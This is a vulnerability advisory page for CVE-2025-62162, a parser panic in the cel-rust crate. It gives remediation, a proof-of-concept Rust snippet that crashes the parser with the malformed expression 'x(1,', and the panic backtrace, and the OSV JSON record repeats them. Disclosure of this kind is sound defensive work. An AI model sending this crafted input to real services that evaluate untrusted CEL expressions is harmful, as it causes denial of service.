Vulnerability-Lookup

GHSA-WXWX-9FH7-5MRW

Vulnerability from github – Published: 2025-10-11 01:30 – Updated: 2025-10-11 01:30

Summary

cel-rust May Panic During Parsing of Invalid CEL Expressions

Details

Summary

Parsing certain malformed CEL expressions can cause the parser to panic, terminating the process. When the crate is used to evaluate untrusted expressions (e.g., user-supplied input over an API), an attacker can send crafted input to trigger a denial of service (DoS).

Remediation

Upgrade to 0.11.4

[dependencies]
cel = "0.11.4"

PoC

use cel::{Context, Program};

fn main() {
    let program = Program::compile("x(1,").unwrap();
    let context = Context::default();
    let value = program.execute(&context).unwrap();
    assert_eq!(value, true.into());
}

$ RUST_BACKTRACE=1 cargo run --bin example-simple
   Compiling num-traits v0.2.19
   Compiling aho-corasick v1.1.3
   Compiling regex-syntax v0.8.5
   Compiling arbitrary v1.4.1
   Compiling serde v1.0.219
   Compiling thiserror v1.0.69
   Compiling regex-automata v0.4.9
   Compiling chrono v0.4.41
   Compiling regex v1.11.1
   Compiling cel v0.10.0 (/home/john/git/cel-rust/cel)

warning: `cel` (lib) generated 15 warnings
   Compiling example v0.1.0 (/home/john/git/cel-rust/example)
    Finished `dev` profile [unoptimized + debuginfo] target(s) in 2.97s
     Running `target/debug/example-simple`

thread 'main' panicked at /home/john/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/antlr4rust-0.3.0-beta3/src/tree.rs:383:9:
internal error: entered unreachable code: should have been properly implemented by generated context when reachable
stack backtrace:
   0: __rustc::rust_begin_unwind
   1: core::panicking::panic_fmt
   2: antlr4rust::tree::Visitable::accept
   3: <cel::parser::gen::celparser::UnaryContextAll as antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor>>::accept
   4: <dyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn<T>>::accept_dyn
   5: <T as antlr4rust::tree::VisitChildren<Node>>::visit_node
   6: <cel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat>::visit
   7: <cel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat>::visit_calc
   8: <T as cel::parser::gen::celvisitor::CELVisitor>::visit_calc
   9: cel::parser::gen::celparser::<impl antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor> for antlr4rust::parser_rule_context::BaseParserRuleContext<cel::parser::gen::celparser::CalcContextExt>>::accept
  10: <dyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn<T>>::accept_dyn
  11: <T as antlr4rust::tree::VisitChildren<Node>>::visit_node
  12: <cel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat>::visit
  13: <cel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat>::visit_relation
  14: <T as cel::parser::gen::celvisitor::CELVisitor>::visit_relation
  15: cel::parser::gen::celparser::<impl antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor> for antlr4rust::parser_rule_context::BaseParserRuleContext<cel::parser::gen::celparser::RelationContextExt>>::accept
  16: <dyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn<T>>::accept_dyn
  17: <T as antlr4rust::tree::VisitChildren<Node>>::visit_node
  18: <cel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat>::visit
  19: <cel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat>::visit_conditionalAnd
  20: <T as cel::parser::gen::celvisitor::CELVisitor>::visit_conditionalAnd
  21: cel::parser::gen::celparser::<impl antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor> for antlr4rust::parser_rule_context::BaseParserRuleContext<cel::parser::gen::celparser::ConditionalAndContextExt>>::accept
  22: <dyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn<T>>::accept_dyn
  23: <T as antlr4rust::tree::VisitChildren<Node>>::visit_node
  24: <cel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat>::visit
  25: <cel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat>::visit_conditionalOr
  26: <T as cel::parser::gen::celvisitor::CELVisitor>::visit_conditionalOr
  27: cel::parser::gen::celparser::<impl antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor> for antlr4rust::parser_rule_context::BaseParserRuleContext<cel::parser::gen::celparser::ConditionalOrContextExt>>::accept
  28: <dyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn<T>>::accept_dyn
  29: <T as antlr4rust::tree::VisitChildren<Node>>::visit_node
  30: <cel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat>::visit
  31: <cel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat>::visit_expr
  32: <T as cel::parser::gen::celvisitor::CELVisitor>::visit_expr
  33: cel::parser::gen::celparser::<impl antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor> for antlr4rust::parser_rule_context::BaseParserRuleContext<cel::parser::gen::celparser::ExprContextExt>>::accept
  34: <dyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn<T>>::accept_dyn
  35: <T as antlr4rust::tree::VisitChildren<Node>>::visit_node
  36: <cel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat>::visit
  37: <cel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat>::visit_GlobalCall::{{closure}}
  38: <core::iter::adapters::map::Map<I,F> as core::iter::traits::iterator::Iterator>::next
  39: alloc::vec::Vec<T,A>::extend_desugared
  40: <alloc::vec::Vec<T,A> as alloc::vec::spec_extend::SpecExtend<T,I>>::spec_extend
  41: <alloc::vec::Vec<T> as alloc::vec::spec_from_iter_nested::SpecFromIterNested<T,I>>::from_iter
  42: <alloc::vec::Vec<T> as alloc::vec::spec_from_iter::SpecFromIter<T,I>>::from_iter
  43: <alloc::vec::Vec<T> as core::iter::traits::collect::FromIterator<T>>::from_iter
  44: core::iter::traits::iterator::Iterator::collect
  45: <cel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat>::visit_GlobalCall
  46: <T as cel::parser::gen::celvisitor::CELVisitor>::visit_GlobalCall
  47: cel::parser::gen::celparser::<impl antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor> for antlr4rust::parser_rule_context::BaseParserRuleContext<cel::parser::gen::celparser::GlobalCallContextExt>>::accept
  48: <cel::parser::gen::celparser::PrimaryContextAll as antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor>>::accept
  49: <dyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn<T>>::accept_dyn
  50: <T as antlr4rust::tree::VisitChildren<Node>>::visit_node
  51: <cel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat>::visit
  52: <cel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat>::visit_PrimaryExpr
  53: <T as cel::parser::gen::celvisitor::CELVisitor>::visit_PrimaryExpr
  54: cel::parser::gen::celparser::<impl antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor> for antlr4rust::parser_rule_context::BaseParserRuleContext<cel::parser::gen::celparser::PrimaryExprContextExt>>::accept
  55: <cel::parser::gen::celparser::MemberContextAll as antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor>>::accept
  56: <dyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn<T>>::accept_dyn
  57: <T as antlr4rust::tree::VisitChildren<Node>>::visit_node
  58: <cel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat>::visit
  59: <cel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat>::visit_MemberExpr
  60: <T as cel::parser::gen::celvisitor::CELVisitor>::visit_MemberExpr
  61: cel::parser::gen::celparser::<impl antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor> for antlr4rust::parser_rule_context::BaseParserRuleContext<cel::parser::gen::celparser::MemberExprContextExt>>::accept
  62: <cel::parser::gen::celparser::UnaryContextAll as antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor>>::accept
  63: <dyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn<T>>::accept_dyn
  64: <T as antlr4rust::tree::VisitChildren<Node>>::visit_node
  65: <cel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat>::visit
  66: <cel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat>::visit_calc
  67: <T as cel::parser::gen::celvisitor::CELVisitor>::visit_calc
  68: cel::parser::gen::celparser::<impl antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor> for antlr4rust::parser_rule_context::BaseParserRuleContext<cel::parser::gen::celparser::CalcContextExt>>::accept
  69: <dyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn<T>>::accept_dyn
  70: <T as antlr4rust::tree::VisitChildren<Node>>::visit_node
  71: <cel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat>::visit
  72: <cel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat>::visit_relation
  73: <T as cel::parser::gen::celvisitor::CELVisitor>::visit_relation
  74: cel::parser::gen::celparser::<impl antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor> for antlr4rust::parser_rule_context::BaseParserRuleContext<cel::parser::gen::celparser::RelationContextExt>>::accept
  75: <dyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn<T>>::accept_dyn
  76: <T as antlr4rust::tree::VisitChildren<Node>>::visit_node
  77: <cel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat>::visit
  78: <cel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat>::visit_conditionalAnd
  79: <T as cel::parser::gen::celvisitor::CELVisitor>::visit_conditionalAnd
  80: cel::parser::gen::celparser::<impl antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor> for antlr4rust::parser_rule_context::BaseParserRuleContext<cel::parser::gen::celparser::ConditionalAndContextExt>>::accept
  81: <dyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn<T>>::accept_dyn
  82: <T as antlr4rust::tree::VisitChildren<Node>>::visit_node
  83: <cel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat>::visit
  84: <cel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat>::visit_conditionalOr
  85: <T as cel::parser::gen::celvisitor::CELVisitor>::visit_conditionalOr
  86: cel::parser::gen::celparser::<impl antlr4rust::tree::Visitable<dyn cel::parser::gen::celvisitor::CELVisitor> for antlr4rust::parser_rule_context::BaseParserRuleContext<cel::parser::gen::celparser::ConditionalOrContextExt>>::accept
  87: <dyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn<T>>::accept_dyn
  88: <T as antlr4rust::tree::VisitChildren<Node>>::visit_node
  89: <cel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat>::visit
  90: <cel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat>::visit_expr
  91: <T as cel::parser::gen::celvisitor::CELVisitor>::visit_expr
note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.

Impact

Users accepting untrusted CEL expressions

Severity

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "cel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.10.0"
            },
            {
              "fixed": "0.11.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-62162"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-11T01:30:53Z",
    "nvd_published_at": "2025-10-10T23:15:36Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nParsing certain malformed CEL expressions can cause the parser to panic, terminating the process. When the crate is used to evaluate untrusted expressions (e.g., user-supplied input over an API), an attacker can send crafted input to trigger a denial of service (DoS).\n\n### Remediation\nUpgrade to 0.11.4\n```toml\n[dependencies]\ncel = \"0.11.4\"\n```\n\n### PoC\n\n```rust\nuse cel::{Context, Program};\n\nfn main() {\n    let program = Program::compile(\"x(1,\").unwrap();\n    let context = Context::default();\n    let value = program.execute(\u0026context).unwrap();\n    assert_eq!(value, true.into());\n}\n```\n\n```\n$ RUST_BACKTRACE=1 cargo run --bin example-simple\n   Compiling num-traits v0.2.19\n   Compiling aho-corasick v1.1.3\n   Compiling regex-syntax v0.8.5\n   Compiling arbitrary v1.4.1\n   Compiling serde v1.0.219\n   Compiling thiserror v1.0.69\n   Compiling regex-automata v0.4.9\n   Compiling chrono v0.4.41\n   Compiling regex v1.11.1\n   Compiling cel v0.10.0 (/home/john/git/cel-rust/cel)\n\nwarning: `cel` (lib) generated 15 warnings\n   Compiling example v0.1.0 (/home/john/git/cel-rust/example)\n    Finished `dev` profile [unoptimized + debuginfo] target(s) in 2.97s\n     Running `target/debug/example-simple`\n\nthread \u0027main\u0027 panicked at /home/john/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/antlr4rust-0.3.0-beta3/src/tree.rs:383:9:\ninternal error: entered unreachable code: should have been properly implemented by generated context when reachable\nstack backtrace:\n   0: __rustc::rust_begin_unwind\n   1: core::panicking::panic_fmt\n   2: antlr4rust::tree::Visitable::accept\n   3: \u003ccel::parser::gen::celparser::UnaryContextAll as antlr4rust::tree::Visitable\u003cdyn cel::parser::gen::celvisitor::CELVisitor\u003e\u003e::accept\n   4: \u003cdyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn\u003cT\u003e\u003e::accept_dyn\n   5: \u003cT as antlr4rust::tree::VisitChildren\u003cNode\u003e\u003e::visit_node\n   6: \u003ccel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat\u003e::visit\n   7: \u003ccel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat\u003e::visit_calc\n   8: \u003cT as cel::parser::gen::celvisitor::CELVisitor\u003e::visit_calc\n   9: cel::parser::gen::celparser::\u003cimpl antlr4rust::tree::Visitable\u003cdyn cel::parser::gen::celvisitor::CELVisitor\u003e for antlr4rust::parser_rule_context::BaseParserRuleContext\u003ccel::parser::gen::celparser::CalcContextExt\u003e\u003e::accept\n  10: \u003cdyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn\u003cT\u003e\u003e::accept_dyn\n  11: \u003cT as antlr4rust::tree::VisitChildren\u003cNode\u003e\u003e::visit_node\n  12: \u003ccel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat\u003e::visit\n  13: \u003ccel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat\u003e::visit_relation\n  14: \u003cT as cel::parser::gen::celvisitor::CELVisitor\u003e::visit_relation\n  15: cel::parser::gen::celparser::\u003cimpl antlr4rust::tree::Visitable\u003cdyn cel::parser::gen::celvisitor::CELVisitor\u003e for antlr4rust::parser_rule_context::BaseParserRuleContext\u003ccel::parser::gen::celparser::RelationContextExt\u003e\u003e::accept\n  16: \u003cdyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn\u003cT\u003e\u003e::accept_dyn\n  17: \u003cT as antlr4rust::tree::VisitChildren\u003cNode\u003e\u003e::visit_node\n  18: \u003ccel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat\u003e::visit\n  19: \u003ccel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat\u003e::visit_conditionalAnd\n  20: \u003cT as cel::parser::gen::celvisitor::CELVisitor\u003e::visit_conditionalAnd\n  21: cel::parser::gen::celparser::\u003cimpl antlr4rust::tree::Visitable\u003cdyn cel::parser::gen::celvisitor::CELVisitor\u003e for antlr4rust::parser_rule_context::BaseParserRuleContext\u003ccel::parser::gen::celparser::ConditionalAndContextExt\u003e\u003e::accept\n  22: \u003cdyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn\u003cT\u003e\u003e::accept_dyn\n  23: \u003cT as antlr4rust::tree::VisitChildren\u003cNode\u003e\u003e::visit_node\n  24: \u003ccel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat\u003e::visit\n  25: \u003ccel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat\u003e::visit_conditionalOr\n  26: \u003cT as cel::parser::gen::celvisitor::CELVisitor\u003e::visit_conditionalOr\n  27: cel::parser::gen::celparser::\u003cimpl antlr4rust::tree::Visitable\u003cdyn cel::parser::gen::celvisitor::CELVisitor\u003e for antlr4rust::parser_rule_context::BaseParserRuleContext\u003ccel::parser::gen::celparser::ConditionalOrContextExt\u003e\u003e::accept\n  28: \u003cdyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn\u003cT\u003e\u003e::accept_dyn\n  29: \u003cT as antlr4rust::tree::VisitChildren\u003cNode\u003e\u003e::visit_node\n  30: \u003ccel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat\u003e::visit\n  31: \u003ccel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat\u003e::visit_expr\n  32: \u003cT as cel::parser::gen::celvisitor::CELVisitor\u003e::visit_expr\n  33: cel::parser::gen::celparser::\u003cimpl antlr4rust::tree::Visitable\u003cdyn cel::parser::gen::celvisitor::CELVisitor\u003e for antlr4rust::parser_rule_context::BaseParserRuleContext\u003ccel::parser::gen::celparser::ExprContextExt\u003e\u003e::accept\n  34: \u003cdyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn\u003cT\u003e\u003e::accept_dyn\n  35: \u003cT as antlr4rust::tree::VisitChildren\u003cNode\u003e\u003e::visit_node\n  36: \u003ccel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat\u003e::visit\n  37: \u003ccel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat\u003e::visit_GlobalCall::{{closure}}\n  38: \u003ccore::iter::adapters::map::Map\u003cI,F\u003e as core::iter::traits::iterator::Iterator\u003e::next\n  39: alloc::vec::Vec\u003cT,A\u003e::extend_desugared\n  40: \u003calloc::vec::Vec\u003cT,A\u003e as alloc::vec::spec_extend::SpecExtend\u003cT,I\u003e\u003e::spec_extend\n  41: \u003calloc::vec::Vec\u003cT\u003e as alloc::vec::spec_from_iter_nested::SpecFromIterNested\u003cT,I\u003e\u003e::from_iter\n  42: \u003calloc::vec::Vec\u003cT\u003e as alloc::vec::spec_from_iter::SpecFromIter\u003cT,I\u003e\u003e::from_iter\n  43: \u003calloc::vec::Vec\u003cT\u003e as core::iter::traits::collect::FromIterator\u003cT\u003e\u003e::from_iter\n  44: core::iter::traits::iterator::Iterator::collect\n  45: \u003ccel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat\u003e::visit_GlobalCall\n  46: \u003cT as cel::parser::gen::celvisitor::CELVisitor\u003e::visit_GlobalCall\n  47: cel::parser::gen::celparser::\u003cimpl antlr4rust::tree::Visitable\u003cdyn cel::parser::gen::celvisitor::CELVisitor\u003e for antlr4rust::parser_rule_context::BaseParserRuleContext\u003ccel::parser::gen::celparser::GlobalCallContextExt\u003e\u003e::accept\n  48: \u003ccel::parser::gen::celparser::PrimaryContextAll as antlr4rust::tree::Visitable\u003cdyn cel::parser::gen::celvisitor::CELVisitor\u003e\u003e::accept\n  49: \u003cdyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn\u003cT\u003e\u003e::accept_dyn\n  50: \u003cT as antlr4rust::tree::VisitChildren\u003cNode\u003e\u003e::visit_node\n  51: \u003ccel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat\u003e::visit\n  52: \u003ccel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat\u003e::visit_PrimaryExpr\n  53: \u003cT as cel::parser::gen::celvisitor::CELVisitor\u003e::visit_PrimaryExpr\n  54: cel::parser::gen::celparser::\u003cimpl antlr4rust::tree::Visitable\u003cdyn cel::parser::gen::celvisitor::CELVisitor\u003e for antlr4rust::parser_rule_context::BaseParserRuleContext\u003ccel::parser::gen::celparser::PrimaryExprContextExt\u003e\u003e::accept\n  55: \u003ccel::parser::gen::celparser::MemberContextAll as antlr4rust::tree::Visitable\u003cdyn cel::parser::gen::celvisitor::CELVisitor\u003e\u003e::accept\n  56: \u003cdyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn\u003cT\u003e\u003e::accept_dyn\n  57: \u003cT as antlr4rust::tree::VisitChildren\u003cNode\u003e\u003e::visit_node\n  58: \u003ccel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat\u003e::visit\n  59: \u003ccel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat\u003e::visit_MemberExpr\n  60: \u003cT as cel::parser::gen::celvisitor::CELVisitor\u003e::visit_MemberExpr\n  61: cel::parser::gen::celparser::\u003cimpl antlr4rust::tree::Visitable\u003cdyn cel::parser::gen::celvisitor::CELVisitor\u003e for antlr4rust::parser_rule_context::BaseParserRuleContext\u003ccel::parser::gen::celparser::MemberExprContextExt\u003e\u003e::accept\n  62: \u003ccel::parser::gen::celparser::UnaryContextAll as antlr4rust::tree::Visitable\u003cdyn cel::parser::gen::celvisitor::CELVisitor\u003e\u003e::accept\n  63: \u003cdyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn\u003cT\u003e\u003e::accept_dyn\n  64: \u003cT as antlr4rust::tree::VisitChildren\u003cNode\u003e\u003e::visit_node\n  65: \u003ccel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat\u003e::visit\n  66: \u003ccel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat\u003e::visit_calc\n  67: \u003cT as cel::parser::gen::celvisitor::CELVisitor\u003e::visit_calc\n  68: cel::parser::gen::celparser::\u003cimpl antlr4rust::tree::Visitable\u003cdyn cel::parser::gen::celvisitor::CELVisitor\u003e for antlr4rust::parser_rule_context::BaseParserRuleContext\u003ccel::parser::gen::celparser::CalcContextExt\u003e\u003e::accept\n  69: \u003cdyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn\u003cT\u003e\u003e::accept_dyn\n  70: \u003cT as antlr4rust::tree::VisitChildren\u003cNode\u003e\u003e::visit_node\n  71: \u003ccel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat\u003e::visit\n  72: \u003ccel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat\u003e::visit_relation\n  73: \u003cT as cel::parser::gen::celvisitor::CELVisitor\u003e::visit_relation\n  74: cel::parser::gen::celparser::\u003cimpl antlr4rust::tree::Visitable\u003cdyn cel::parser::gen::celvisitor::CELVisitor\u003e for antlr4rust::parser_rule_context::BaseParserRuleContext\u003ccel::parser::gen::celparser::RelationContextExt\u003e\u003e::accept\n  75: \u003cdyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn\u003cT\u003e\u003e::accept_dyn\n  76: \u003cT as antlr4rust::tree::VisitChildren\u003cNode\u003e\u003e::visit_node\n  77: \u003ccel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat\u003e::visit\n  78: \u003ccel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat\u003e::visit_conditionalAnd\n  79: \u003cT as cel::parser::gen::celvisitor::CELVisitor\u003e::visit_conditionalAnd\n  80: cel::parser::gen::celparser::\u003cimpl antlr4rust::tree::Visitable\u003cdyn cel::parser::gen::celvisitor::CELVisitor\u003e for antlr4rust::parser_rule_context::BaseParserRuleContext\u003ccel::parser::gen::celparser::ConditionalAndContextExt\u003e\u003e::accept\n  81: \u003cdyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn\u003cT\u003e\u003e::accept_dyn\n  82: \u003cT as antlr4rust::tree::VisitChildren\u003cNode\u003e\u003e::visit_node\n  83: \u003ccel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat\u003e::visit\n  84: \u003ccel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat\u003e::visit_conditionalOr\n  85: \u003cT as cel::parser::gen::celvisitor::CELVisitor\u003e::visit_conditionalOr\n  86: cel::parser::gen::celparser::\u003cimpl antlr4rust::tree::Visitable\u003cdyn cel::parser::gen::celvisitor::CELVisitor\u003e for antlr4rust::parser_rule_context::BaseParserRuleContext\u003ccel::parser::gen::celparser::ConditionalOrContextExt\u003e\u003e::accept\n  87: \u003cdyn cel::parser::gen::celparser::CELParserContext+Ctx = cel::parser::gen::celparser::CELParserContextType+TF = antlr4rust::token_factory::CommonTokenFactory as antlr4rust::tree::VisitableDyn\u003cT\u003e\u003e::accept_dyn\n  88: \u003cT as antlr4rust::tree::VisitChildren\u003cNode\u003e\u003e::visit_node\n  89: \u003ccel::parser::parser::Parser as antlr4rust::tree::ParseTreeVisitorCompat\u003e::visit\n  90: \u003ccel::parser::parser::Parser as cel::parser::gen::celvisitor::CELVisitorCompat\u003e::visit_expr\n  91: \u003cT as cel::parser::gen::celvisitor::CELVisitor\u003e::visit_expr\nnote: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.\n```\n\n### Impact\nUsers accepting untrusted CEL expressions",
  "id": "GHSA-wxwx-9fh7-5mrw",
  "modified": "2025-10-11T01:30:54Z",
  "published": "2025-10-11T01:30:53Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/cel-rust/cel-rust/security/advisories/GHSA-wxwx-9fh7-5mrw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62162"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cel-rust/cel-rust/commit/9df9822d81d91a3ce0fc9f712f4574a659247be3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/cel-rust/cel-rust"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cel-rust/cel-rust/releases/tag/cel-v0.11.4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "cel-rust May Panic During Parsing of Invalid CEL Expressions"
}

CVE-2025-62162 (GCVE-0-2025-62162)

Vulnerability from cvelistv5 – Published: 2025-10-10 22:25 – Updated: 2025-10-14 14:16

Title

cel-rust May Panic During Parsing of Invalid CEL Expressions

Summary

cel-rust is a Common Expression Language interpreter written in Rust. Starting in version 0.10.0 and prior to version 0.11.4, parsing certain malformed CEL expressions can cause the parser to panic, terminating the process. When the crate is used to evaluate untrusted expressions (e.g., user-supplied input over an API), an attacker can send crafted input to trigger a denial of service (DoS). Version 0.11.4 fixes the issue.

Severity

7.5 (High)


                        
